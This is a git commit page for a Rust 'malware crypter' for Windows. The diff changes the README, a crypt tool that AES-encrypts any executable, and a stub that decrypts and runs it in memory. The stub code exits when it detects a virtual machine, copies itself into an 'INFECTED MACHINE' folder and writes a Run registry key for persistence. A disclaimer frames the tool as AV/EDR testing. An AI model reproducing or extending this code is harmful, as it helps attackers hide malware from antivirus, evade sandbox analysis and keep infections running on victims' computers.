jory/AES-Encrypter-Rust
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Adding the ability to pass the EXE name as a commandline argument. I like this better than having a hardcoded exe name

Browse Source
This commit is contained in:
mitch edwards // valhalla_dev 2024-07-15 10:43:28 -05:00
parent b549c514e9
commit ba8d0feeb9
4 changed files with 32 additions and 32 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1
.gitignore vendored Normal file
View File

@ -0,0 +1 @@
**/target/**

6
README.md
View File

@ -2,8 +2,8 @@
x86-64 Malware Crypter built in Rust for Windows with Anti-VM, powered by memexec x86-64 Malware Crypter built in Rust for Windows with Anti-VM, powered by memexec
## Usage ## Usage
1. Put your Portable Executable in /crypt/ and rename it to example.exe (or change the code to be the same name as your PE) 1. Put your Portable Executable in /crypt/
2. In /crypt/ `cargo run` 2. In /crypt/ `cargo run <name_of_pe.exe>`
(will output encrypted_bytes.bin and key.txt) (will output encrypted_bytes.bin and key.txt)
3. move encrypted_bytes.bin and key.txt to /stub/src/ 3. move encrypted_bytes.bin and key.txt to /stub/src/
4. In /stub/ `cargo build --target x86_64-pc-windows-gnu --release` or build without `--release` to keep debug symbols 4. In /stub/ `cargo build --target x86_64-pc-windows-gnu --release` or build without `--release` to keep debug symbols
@ -24,7 +24,7 @@ x86-64 Malware Crypter built in Rust for Windows with Anti-VM, powered by memexe
- Obfuscated Strings - Obfuscated Strings
## Disclaimer ## Disclaimer
This is a tool used to test the Dynamic detection capabilites of AV and EDR, use of this project is at your own risk This is a tool used to test the Static + Dynamic detection capabilites of AV and EDR, use of this project is at your own risk
## MITRE TTPs (Indicators) ## MITRE TTPs (Indicators)
- User Execution: Malicious File T1204.002 - User Execution: Malicious File T1204.002

22
crypt/src/main.rs
View File

@ -1,17 +1,23 @@
use aes::cipher::{generic_array::GenericArray, BlockEncrypt, KeyInit};
use aes::Aes128; use aes::Aes128;
use aes::cipher::{ use rand::rngs::StdRng;
BlockEncrypt, KeyInit, use rand::{RngCore, SeedableRng};
generic_array::GenericArray,
};
use std::fs::read; use std::fs::read;
use std::fs::File; use std::fs::File;
use std::io::prelude::*; use std::io::prelude::*;
use rand::rngs::StdRng;
use rand::{RngCore, SeedableRng};
fn main() -> std::io::Result<()> { fn main() -> std::io::Result<()> {
// Read input file into a vector RENAME example.exe to what you want and put it in this "crypt" folder // Read input file into a vector RENAME example.exe to what you want and put it in this "crypt" folder
let plaintext_bytes = read("hexowl.exe").expect("Failed to read file"); let args: Vec<String> = std::env::args().collect();
if args.len() < 2 {
println!("Run with {} <inputfile.exe>", args.get(0).unwrap());
return Err(std::io::Error::new(
std::io::ErrorKind::NotFound,
"file input not found",
));
}
let fname = args.get(1).unwrap();
let plaintext_bytes = read(fname).expect("Failed to read file");
let mut encrypted_file = File::create("encrypted_Input.bin")?; let mut encrypted_file = File::create("encrypted_Input.bin")?;
let mut key_file = File::create("key.txt")?; let mut key_file = File::create("key.txt")?;
@ -43,4 +49,4 @@ fn main() -> std::io::Result<()> {
encrypted_file.write_all(&enc_bytes)?; encrypted_file.write_all(&enc_bytes)?;
key_file.write_all(&key)?; key_file.write_all(&key)?;
Ok(()) Ok(())
} }

35
stub/src/main.rs
View File

@ -1,27 +1,20 @@
use aes::cipher::{generic_array::GenericArray, BlockDecrypt, KeyInit};
use aes::Aes128; use aes::Aes128;
use aes::cipher::{BlockDecrypt, KeyInit,
generic_array::GenericArray,
};
use inside_vm::inside_vm; use inside_vm::inside_vm;
use std::process::Command;
use std::{fs, env};
use std::io::{Read, Cursor, self};
use std::io::Result; use std::io::Result;
use std::io::{self, Cursor, Read};
use std::path::Path; use std::path::Path;
use std::process::Command;
use std::{env, fs};
use winreg::enums::{HKEY_CURRENT_USER, KEY_ALL_ACCESS}; use winreg::enums::{HKEY_CURRENT_USER, KEY_ALL_ACCESS};
use winreg::RegKey; use winreg::RegKey;
fn main() { fn main() {
if inside_vm() {
if inside_vm(){
println!("This is in a vm"); println!("This is in a vm");
std::process::exit(0); std::process::exit(0);
} else { } else {
println!("NO VM"); println!("NO VM");
create_infected_directory(); create_infected_directory();
@ -43,7 +36,7 @@ fn decrypt_file() -> Result<Vec<u8>> {
let key = GenericArray::from(key_bytes); let key = GenericArray::from(key_bytes);
let cipher = Aes128::new(&key); let cipher = Aes128::new(&key);
// Decrypt the encrypted bytes in blocks // Decrypt the encrypted bytes in blocks
let mut decrypted_bytes = Vec::new(); let mut decrypted_bytes = Vec::new();
for block in encrypted_bytes.chunks(16) { for block in encrypted_bytes.chunks(16) {
let mut block_array = GenericArray::clone_from_slice(block); let mut block_array = GenericArray::clone_from_slice(block);
@ -54,9 +47,9 @@ fn decrypt_file() -> Result<Vec<u8>> {
// Unpad the decrypted bytes // Unpad the decrypted bytes
let padding_size = decrypted_bytes.last().unwrap().clone() as usize; let padding_size = decrypted_bytes.last().unwrap().clone() as usize;
let decrypted_bytes = (&decrypted_bytes[..decrypted_bytes.len() - padding_size]).to_vec(); let decrypted_bytes = (&decrypted_bytes[..decrypted_bytes.len() - padding_size]).to_vec();
// return decrypted bytes // return decrypted bytes
Ok(decrypted_bytes, ) Ok(decrypted_bytes)
} }
fn create_infected_directory() -> io::Result<()> { fn create_infected_directory() -> io::Result<()> {
@ -64,9 +57,8 @@ fn create_infected_directory() -> io::Result<()> {
fs::create_dir_all(&infected_dir)?; fs::create_dir_all(&infected_dir)?;
let current_exe = env::current_exe()?; let current_exe = env::current_exe()?;
let current_exe_filename = current_exe let current_exe_filename = current_exe.file_name();
.file_name();
let infected_exe_path = infected_dir.join(current_exe_filename.unwrap()); let infected_exe_path = infected_dir.join(current_exe_filename.unwrap());
fs::copy(&current_exe, &infected_exe_path)?; fs::copy(&current_exe, &infected_exe_path)?;
@ -85,17 +77,18 @@ fn create_infected_directory() -> io::Result<()> {
} }
fn persistence() -> io::Result<()> { fn persistence() -> io::Result<()> {
if let Ok(current_exe) = env::current_exe() { if let Ok(current_exe) = env::current_exe() {
if let Some(file_name) = current_exe.file_stem() { if let Some(file_name) = current_exe.file_stem() {
let executable_name = file_name.to_string_lossy(); let executable_name = file_name.to_string_lossy();
let directory_path = "C:/Rust Crypter - INFECTED MACHINE/"; let directory_path = "C:/Rust Crypter - INFECTED MACHINE/";
let file_path = format!("{}{}.exe", directory_path, executable_name); let file_path = format!("{}{}.exe", directory_path, executable_name);
// Open the "Run" registry key // Open the "Run" registry key
let hkcu = RegKey::predef(HKEY_CURRENT_USER); let hkcu = RegKey::predef(HKEY_CURRENT_USER);
let run_key = hkcu.open_subkey_with_flags("Software\\Microsoft\\Windows\\CurrentVersion\\Run", KEY_ALL_ACCESS)?; let run_key = hkcu.open_subkey_with_flags(
"Software\\Microsoft\\Windows\\CurrentVersion\\Run",
KEY_ALL_ACCESS,
)?;
// Add the executable path to the "Run" registry key // Add the executable path to the "Run" registry key
run_key.set_value("RustCrypter", &file_path).err(); run_key.set_value("RustCrypter", &file_path).err();